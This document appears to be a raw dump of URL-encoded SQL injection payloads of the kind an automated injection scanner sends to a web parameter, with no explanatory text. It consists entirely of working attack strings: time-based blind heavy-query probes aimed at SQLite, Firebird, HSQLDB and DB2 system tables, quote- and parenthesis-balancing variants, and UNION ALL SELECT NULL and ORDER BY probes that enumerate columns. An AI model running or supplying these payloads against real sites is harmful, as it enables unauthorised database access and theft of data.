-5887%27%29%29%29%20OR%202794%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%28%28%28%27mjaw%27%20LIKE%20%27mjaw -1334%27%20OR%202794%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%27QkMx%27%20LIKE%20%27QkMx -7629%22%29%20OR%202794%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%28%22PJRa%22%3D%22PJRa -7168%22%29%29%20OR%202794%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%28%28%22CLbH%22%3D%22CLbH -8438%22%29%29%29%20OR%202794%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%28%28%28%22TAvz%22%3D%22TAvz -1445%22%20OR%202794%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%22rYMA%22%3D%22rYMA -9696%22%29%20OR%202794%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%28%22gjki%22%20LIKE%20%22gjki -3976%22%29%29%20OR%202794%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%28%28%22fXPf%22%20LIKE%20%22fXPf -2317%22%29%29%29%20OR%202794%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%28%28%28%22MLcx%22%20LIKE%20%22MLcx -4609%22%20OR%202794%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%22GLrG%22%20LIKE%20%22GLrG -7313%29%20WHERE%203173%3D3173%20OR%202794%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29 -5317%27%29%20WHERE%206797%3D6797%20OR%202794%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29 -3845%27%20WHERE%208254%3D8254%20OR%202794%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29 -3087%22%20WHERE%205753%3D5753%20OR%202794%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29 -4354%29%20OR%201115%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29 -7484%27%29%20OR%201115%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29 -5415%27%20OR%201115%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29 -1439%22%20OR%201115%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29 -4489%29%20OR%201115%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%288375%3D8375 -6058%29%29%20OR%201115%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%28%286822%3D6822 -2540%29%29%29%20OR%201115%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%28%28%285774%3D5774 -5247%20OR%201115%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29 -5384%27%29%20OR%201115%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%28%27iKTD%27%3D%27iKTD -6635%27%29%29%20OR%201115%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%28%28%27BSlK%27%3D%27BSlK -6213%27%29%29%29%20OR%201115%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%28%28%28%27TZJB%27%3D%27TZJB -8340%27%20OR%201115%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%27uSXO%27%3D%27uSXO -6521%27%29%20OR%201115%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%28%27WRoT%27%20LIKE%20%27WRoT -7431%27%29%29%20OR%201115%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%28%28%27uWex%27%20LIKE%20%27uWex -7222%27%29%29%29%20OR%201115%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%28%28%28%27vfKw%27%20LIKE%20%27vfKw -5310%27%20OR%201115%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%27yKDb%27%20LIKE%20%27yKDb -6057%22%29%20OR%201115%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%28%22kXuv%22%3D%22kXuv -8759%22%29%29%20OR%201115%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%28%28%22PjRN%22%3D%22PjRN -8810%22%29%29%29%20OR%201115%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%28%28%28%22seOZ%22%3D%22seOZ -4226%22%20OR%201115%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%22NOCa%22%3D%22NOCa -1196%22%29%20OR%201115%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%28%22PAXc%22%20LIKE%20%22PAXc -7123%22%29%29%20OR%201115%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%28%28%22MSEU%22%20LIKE%20%22MSEU -5271%22%29%29%29%20OR%201115%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%28%28%28%22ZWZP%22%20LIKE%20%22ZWZP -2706%22%20OR%201115%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%22khAf%22%20LIKE%20%22khAf -5883%29%20WHERE%209433%3D9433%20OR%201115%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29 -3074%27%29%20WHERE%204793%3D4793%20OR%201115%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29 -8884%27%20WHERE%202061%3D2061%20OR%201115%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29 -4278%22%20WHERE%208355%3D8355%20OR%201115%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29 -9208%29%20OR%201639%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29 -9030%27%29%20OR%201639%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29 -1664%27%20OR%201639%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29 -7642%22%20OR%201639%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29 -7191%29%20OR%201639%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%284336%3D4336 -4921%29%29%20OR%201639%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%28%282237%3D2237 -6164%29%29%29%20OR%201639%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%281433%3D1433 -2894%20OR%201639%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29 -2121%27%29%20OR%201639%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%28%27hdlQ%27%3D%27hdlQ -9727%27%29%29%20OR%201639%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%27iDPC%27%3D%27iDPC -7318%27%29%29%29%20OR%201639%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%28%27GRuW%27%3D%27GRuW -5263%27%20OR%201639%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%27sbzF%27%3D%27sbzF -2057%27%29%20OR%201639%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%28%27iQZa%27%20LIKE%20%27iQZa -7701%27%29%29%20OR%201639%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%27hHsa%27%20LIKE%20%27hHsa -3887%27%29%29%29%20OR%201639%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%28%27qpLM%27%20LIKE%20%27qpLM -7298%27%20OR%201639%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%27SKeu%27%20LIKE%20%27SKeu -9889%22%29%20OR%201639%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%28%22rutz%22%3D%22rutz -3054%22%29%29%20OR%201639%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%22uAIT%22%3D%22uAIT -5646%22%29%29%29%20OR%201639%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%28%22VhRI%22%3D%22VhRI -6489%22%20OR%201639%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%22oMIG%22%3D%22oMIG -6763%22%29%20OR%201639%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%28%22OZWP%22%20LIKE%20%22OZWP -3435%22%29%29%20OR%201639%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%22zmkN%22%20LIKE%20%22zmkN -8511%22%29%29%29%20OR%201639%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%28%22PDwG%22%20LIKE%20%22PDwG -1551%22%20OR%201639%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%22zWAh%22%20LIKE%20%22zWAh -6422%29%20WHERE%207420%3D7420%20OR%201639%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29 -4326%27%29%20WHERE%204274%3D4274%20OR%201639%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29 -7535%27%20WHERE%205602%3D5602%20OR%201639%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29 -7758%22%20WHERE%209648%3D9648%20OR%201639%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29 -5020%29%20OR%207294%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29 -3838%27%29%20OR%207294%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29 -8811%27%20OR%207294%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29 -4132%22%20OR%207294%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29 -8869%29%20OR%207294%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%283866%3D3866 -9803%29%29%20OR%207294%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%286049%3D6049 -8077%29%29%29%20OR%207294%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%285459%3D5459 -7313%20OR%207294%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29 -5496%27%29%20OR%207294%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%27Hbzh%27%3D%27Hbzh -7321%27%29%29%20OR%207294%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%27uuEB%27%3D%27uuEB -9594%27%29%29%29%20OR%207294%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%28%27PgfK%27%3D%27PgfK -1534%27%20OR%207294%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%27wCES%27%3D%27wCES -6241%27%29%20OR%207294%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%27oPjB%27%20LIKE%20%27oPjB -3582%27%29%29%20OR%207294%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%27Betn%27%20LIKE%20%27Betn -6640%27%29%29%29%20OR%207294%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%28%27XrFS%27%20LIKE%20%27XrFS -8329%27%20OR%207294%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%27BGdZ%27%20LIKE%20%27BGdZ -8793%22%29%20OR%207294%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%22RxxH%22%3D%22RxxH -4610%22%29%29%20OR%207294%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%22yzVf%22%3D%22yzVf -6144%22%29%29%29%20OR%207294%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%28%22DlEL%22%3D%22DlEL -1973%22%20OR%207294%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%22zfmD%22%3D%22zfmD -8812%22%29%20OR%207294%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%22xSNg%22%20LIKE%20%22xSNg -9516%22%29%29%20OR%207294%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%22GZUv%22%20LIKE%20%22GZUv -4499%22%29%29%29%20OR%207294%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%28%22LVdO%22%20LIKE%20%22LVdO -9971%22%20OR%207294%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%22WWom%22%20LIKE%20%22WWom -6945%29%20WHERE%201722%3D1722%20OR%207294%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29 -3342%27%29%20WHERE%205406%3D5406%20OR%207294%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29 -7517%27%20WHERE%205802%3D5802%20OR%207294%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29 -9573%22%20WHERE%208490%3D8490%20OR%207294%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29 1234.5%29%20ORDER%20BY%201%23 1234.5%29%20ORDER%20BY%207004%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%29%20ORDER%20BY%201%23 1234.5%27%29%20ORDER%20BY%207301%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%20ORDER%20BY%201%23 1234.5%27%20ORDER%20BY%208096%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%22%20ORDER%20BY%201%23 1234.5%22%20ORDER%20BY%202580%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 